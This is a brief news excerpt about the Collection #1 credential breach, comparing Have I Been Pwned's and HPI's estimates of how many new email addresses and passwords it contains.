The obvious measure of these breaches is how much new data they represent, that which has not already been added to databases such as those amassed by HIBP or HPI.

Have I Been Pwned? estimated the unique data in Collection #1 at around 140 million email addresses and at least 11 million unique passwords.

HPI, meanwhile, estimates the number of new credentials at 750 million (it isn’t yet clear how many new passwords this includes).

Read Full Article